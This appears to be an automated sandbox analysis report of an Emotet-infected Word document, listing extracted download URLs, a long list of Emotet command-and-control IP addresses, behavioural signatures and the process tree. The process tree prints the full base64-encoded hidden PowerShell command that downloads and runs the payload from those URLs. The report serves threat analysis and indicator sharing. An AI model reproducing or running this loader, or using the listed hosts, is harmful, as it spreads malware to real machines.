Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
25-01-2020 03:27
General
Malware Config
Extracted
http://relprosurgical.com/wordpress/erEIWTG/
http://compunetplus.com/lacrosseleaguestats/yJpumLt4l/
https://bbs.anyakeji.com/wp-admin/5MNyBTn4B/
http://rodyaevents.com/wp-content/t8v9c/
https://emerson-academy.2019.sites.air-rallies.org/wp-admin/h4u1/
Extracted
emotet
70.180.35.211:80
74.108.124.180:80
85.105.205.77:8080
23.92.16.164:8080
45.55.65.123:8080
217.160.19.232:8080
176.9.43.37:8080
59.103.164.174:80
70.184.9.39:8080
202.175.121.202:8090
62.75.187.192:8080
217.160.182.191:8080
201.184.105.242:443
78.142.114.69:80
159.65.25.128:8080
104.236.246.93:8080
152.168.248.128:443
24.105.202.216:443
121.88.5.176:443
92.222.216.44:8080
93.147.141.5:443
195.244.215.206:80
115.65.111.148:443
62.138.26.28:8080
24.196.49.98:80
186.86.247.171:443
182.176.132.213:8090
211.192.153.224:80
87.106.139.101:8080
190.146.205.227:8080
85.152.174.56:80
101.187.197.33:443
201.173.217.124:443
105.247.123.133:8080
73.11.153.178:8080
190.220.19.82:443
139.130.241.252:443
31.172.240.91:8080
190.143.39.231:80
62.75.141.82:80
91.73.197.90:80
78.101.70.199:443
206.189.112.148:8080
87.230.19.21:8080
178.153.176.124:80
2.237.76.249:80
98.156.206.153:80
188.0.135.237:80
78.24.219.147:8080
88.249.120.205:80
120.151.135.224:80
108.191.2.72:80
100.6.23.40:80
178.237.139.83:8080
45.33.49.124:443
160.16.215.66:8080
205.185.117.108:8080
78.186.5.109:443
108.6.140.26:80
76.104.80.47:443
90.69.145.210:8080
74.130.83.133:80
64.53.242.181:8080
149.202.153.252:8080
85.67.10.190:80
209.146.22.34:443
91.205.215.66:443
209.141.54.221:8080
222.144.13.169:80
211.63.71.72:8080
190.12.119.180:443
223.197.185.60:80
173.21.26.90:80
95.128.43.213:8080
68.114.229.171:80
50.116.86.205:8080
72.189.57.105:80
190.117.226.104:80
78.189.180.107:80
104.131.44.150:8080
64.66.6.71:8080
108.179.206.219:8080
200.71.200.4:443
42.200.226.58:80
5.196.74.210:8080
178.20.74.212:80
177.239.160.121:80
47.153.183.211:80
200.116.145.225:443
179.13.185.19:80
190.53.135.159:21
66.34.201.20:7080
46.105.131.69:443
206.81.10.215:8080
103.97.95.218:80
87.81.51.125:80
180.92.239.110:8080
101.187.237.217:80
58.171.42.66:8080
190.55.181.54:443
120.150.246.241:80
169.239.182.217:8080
46.105.131.87:80
200.21.90.5:443
37.139.21.175:8080
37.187.72.193:8080
61.37.31.243:80
181.13.24.82:80
5.32.55.214:80
201.229.45.222:8080
68.172.243.146:80
210.6.85.121:80
190.114.244.182:443
183.102.238.69:465
190.117.126.169:80
87.106.136.232:8080
110.36.217.66:8080
75.114.235.105:80
24.94.237.248:80
103.86.49.11:8080
101.187.134.207:8080
60.231.217.199:8080
47.6.15.79:80
74.101.225.121:443
118.185.7.132:80
24.164.79.147:8080
181.143.126.170:80
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4932 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3660 1976 Powershell.exe 73 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3660 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3660 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 3860 323.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4932 WINWORD.EXE 4756 323.exe 3860 323.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3660 wrote to memory of 4756 3660 Powershell.exe 80 PID 4756 wrote to memory of 3860 4756 323.exe 81 -
Executes dropped EXE 2 IoCs
pid Process 4756 323.exe 3860 323.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
PID:4932
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABLAGYAcwBvAHEAcQB3AGEAagA9ACcAWgBuAHEAcwBoAG8AYwBuACcAOwAkAFMAaQBkAGwAYQBnAGcAegBvAHYAbQAgAD0AIAAnADMAMgAzACcAOwAkAFMAagBsAHQAbwB3AGwAdwByAD0AJwBUAGcAYgBuAHIAaQB2AGcAcABqACcAOwAkAFUAegByAGcAZwBnAHkAbAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUwBpAGQAbABhAGcAZwB6AG8AdgBtACsAJwAuAGUAeABlACcAOwAkAEwAbQBwAG4AcwBhAHQAegB6AGUAZQBtAGkAPQAnAEMAegBwAG4AeABvAG0AdQBrAHIAdAB3AHUAJwA7ACQAVwBtAHMAeABrAGYAZgBsAGsAbAA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAYgBjAEwASQBlAE4AVAA7ACQAVABkAGYAdABuAGgAeQBuAHUAYgA9ACcAaAB0AHQAcAA6AC8ALwByAGUAbABwAHIAbwBzAHUAcgBnAGkAYwBhAGwALgBjAG8AbQAvAHcAbwByAGQAcAByAGUAcwBzAC8AZQByAEUASQBXAFQARwAvACoAaAB0AHQAcAA6AC8ALwBjAG8AbQBwAHUAbgBlAHQAcABsAHUAcwAuAGMAbwBtAC8AbABhAGMAcgBvAHMAcwBlAGwAZQBhAGcAdQBlAHMAdABhAHQAcwAvAHkASgBwAHUAbQBMAHQANABsAC8AKgBoAHQAdABwAHMAOgAvAC8AYgBiAHMALgBhAG4AeQBhAGsAZQBqAGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADUATQBOAHkAQgBUAG4ANABCAC8AKgBoAHQAdABwADoALwAvAHIAbwBkAHkAYQBlAHYAZQBuAHQAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQAOAB2ADkAYwAvACoAaAB0AHQAcABzADoALwAvAGUAbQBlAHIAcwBvAG4ALQBhAGMAYQBkAGUAbQB5AC4AMgAwADEAOQAuAHMAaQB0AGUAcwAuAGEAaQByAC0AcgBhAGwAbABpAGUAcwAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AaAA0AHUAMQAvACcALgAiAHMAYABQAGwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATQB4AHoAawBhAGgAeQBqAD0AJwBZAHAAbgBvAGMAbwBmAG8AbABzAGcAYQB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABSAHoAYQBuAHcAdAB1AGMAbABrACAAaQBuACAAJABUAGQAZgB0AG4AaAB5AG4AdQBiACkAewB0AHIAeQB7ACQAVwBtAHMAeABrAGYAZgBsAGsAbAAuACIARABgAG8AVwBuAGAATABPAEEARABmAEkAYABMAGUAIgAoACQAUgB6AGEAbgB3AHQAdQBjAGwAawAsACAAJABVAHoAcgBnAGcAZwB5AGwAKQA7ACQAWQBzAGYAdwB6AGQAegBnAHgAcwA9ACcAWQBjAHAAZQBxAHcAcQB5AHoAegBnACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQB6AHIAZwBnAGcAeQBsACkALgAiAEwARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMgA2ADIANQA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAGEAUgBUACIAKAAkAFUAegByAGcAZwBnAHkAbAApADsAJABIAGkAYQB1AG0AYgBkAHoAYgBwAHQAPQAnAFMAegBqAHEAdgB2AGEAZwBsAHYAbwBxACcAOwBiAHIAZQBhAGsAOwAkAFcAbAB6AGwAeAB0AGsAdwBxAD0AJwBHAGUAawB5AGIAYQBrAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBwAGkAawBtAGMAaAB2AG4AbABlAGkAdwA9ACcAQgBkAHYAdABqAHcAagBkAG4AbwByACcA1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Users\Admin\323.exe"C:\Users\Admin\323.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4756 -
C:\Users\Admin\323.exe--9304fa923⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:3860
-
-